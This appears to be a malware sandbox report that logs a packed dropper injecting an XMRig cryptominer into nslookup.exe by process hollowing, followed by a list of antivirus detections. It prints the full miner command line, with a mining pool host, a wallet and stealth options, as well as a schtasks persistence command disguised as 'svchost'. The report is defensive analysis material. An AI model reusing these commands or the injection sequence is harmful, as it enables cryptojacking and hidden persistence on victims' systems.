NtResumeThread

thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

NtResumeThread

thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

CreateProcessInternalW

thread_identifier: 3024
thread_handle: 0x0000000000000320
process_identifier: 872
current_directory: C:\Windows\System32
filepath:
track: 1
command_line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=49XarhMHsp18ZAs9SiucnGHv3LcK7qChbLKquEQftqmbXayAcpYVdHr5Dy6Z7n8EKeKJzjDcms3dJfpC2S2jMGLcFaWBZHG --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x0000000000000324
1 1 0

NtUnmapViewOfSection

base_address: 0x0000000140000000
region_size: 8786417680384
process_identifier: 872
process_handle: 0x0000000000000324
-1073741799 0

NtAllocateVirtualMemory

process_identifier: 872
region_size: 7745536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000324
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $ý›:º¹úTé¹úTé¹úTéâ’Pè¢úTéâ’Wè´úTéâ’QèqúTé'Z“é½úT鲕PèªúT鲕Wè°úT鲕Qè/úTé•Pè«úTéâ’Uè¬úTé¹úUéÓûTé<ŠPèêøTé•]èEúTé•Wè½úTé•«é¸úTé¹úÃé¸úTé•Vè¸úTéRich¹úTéPEd† Náað" ’4,A|2/@0v`ôrGܐu˜s¨ uЉ„ DÐ D(  D0°4x .textd4’4 `.rdatavæ°4è–4@@.dataS+ G~G@À.pdata¨s”H@@_RANDOMXV u¨J@`_SHA3_25@ 0u ¶J@`_TEXT_CNQ@u ÀJ@`_TEXT_CN„`uàJ@`_RDATA”€uòJ@@.rsrc˜uôJ@@.relocЉ uŠúJ@B
base_address: 0x0000000140000000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

NtGetContextThread

thread_handle: 0x00000000000000cc
1 0 0

NtResumeThread

thread_handle: 0x00000000000000cc
suspend_count: 1
process_identifier: 2020
1 0 0

WriteProcessMemory

buffer:
base_address: 0x0000000140001000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000000014034b000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000000014047a000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000140730000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000140752000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000140753000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000140754000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0000000140756000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer: à1ÿ1á1ï1(101@1P1è1€111 1h1°1Ð11®1«1×1§1´1Ä1Ô1¤1Ü1¸1ð1à1°1À1Ð1 1ø1
base_address: 0x0000000140758000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:  €8€P€h€ €  ux“u}x4VS_VERSION_INFO½ïþ?ØStringFileInfo´000004b0 CompanyNamedFileDescriptionWindows Configuration Manager,FileVersion2.0.0$LegalCopyright< OriginalFilenamexmrig.exe\ProductNameWindows Configuration Manager0ProductVersion2.0.0DVarFileInfo$Translation°<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0000000140759000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

WriteProcessMemory

buffer:
base_address: 0x000000014075a000
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtGetContextThread

thread_handle: 0x0000000000000320
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x000007fffffd4010
process_identifier: 872
process_handle: 0x0000000000000324
1 1 0

NtSetContextThread

registers.r14: 0
registers.r15: 0
registers.rcx: 5371802236
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1440632
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000320
process_identifier: 872
1 0 0

NtResumeThread

thread_handle: 0x0000000000000320
suspend_count: 1
process_identifier: 872
1 0 0

CreateProcessInternalW

thread_identifier: 1812
thread_handle: 0x0000000000000060
process_identifier: 3028
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"'
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

NtResumeThread

thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

thread_handle: 0x00000000000001b0
suspend_count: 1
process_identifier: 812
1 0 0

NtResumeThread

thread_handle: 0x00000000000001e0
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

thread_handle: 0x00000000000001e8
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

thread_handle: 0x00000000000001ec
suspend_count: 1
process_identifier: 872
1 0 0

NtResumeThread

thread_handle: 0x00000000000001f0
suspend_count: 1
process_identifier: 872
1 0 0
Elastic malicious (high confidence)
DrWeb Trojan.PackedNET.943
MicroWorld-eScan Gen:Variant.Ursu.411696
FireEye Generic.mg.4197eeb783ac6250
ALYac Gen:Variant.Ursu.411696
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDropper:Win32/dropper.ali1003001
CrowdStrike win/malicious_confidence_90% (W)
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of MSIL/Kryptik.ACHI
APEX Malicious
Paloalto generic.ml
ClamAV Win.Packed.Bulz-9884610-0
Kaspersky HEUR:Trojan.MSIL.Cryptos.gen
BitDefender Gen:Variant.Ursu.411696
Avast Win64:CoinminerX-gen [Trj]
Ad-Aware Gen:Variant.Ursu.411696
Emsisoft Gen:Variant.Ursu.411696 (B)
TrendMicro TROJ_GEN.R002C0DHE21
McAfee-GW-Edition Trojan-FTUW!4197EEB783AC
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1143066
MAX malware (ai score=100)
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:MSIL/AgentTesla.CHH!MTB
GData Gen:Variant.Ursu.411696
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4462767
McAfee Artemis!4197EEB783AC
VBA32 CIL.StupidStealth.Heur
TrendMicro-HouseCall TROJ_GEN.R002C0DHE21
Tencent Msil.Trojan.Cryptos.Pbpf
Ikarus Win32.Outbreak
eGambit Unsafe.AI_Score_99%
Fortinet MSIL/GenKryptik.FHLO!tr
MaxSecure Trojan.Malware.300983.susgen
AVG Win64:CoinminerX-gen [Trj]
Cybereason malicious.783ac6
Qihoo-360 Win64/Miner.Coinminer.HgEASaUA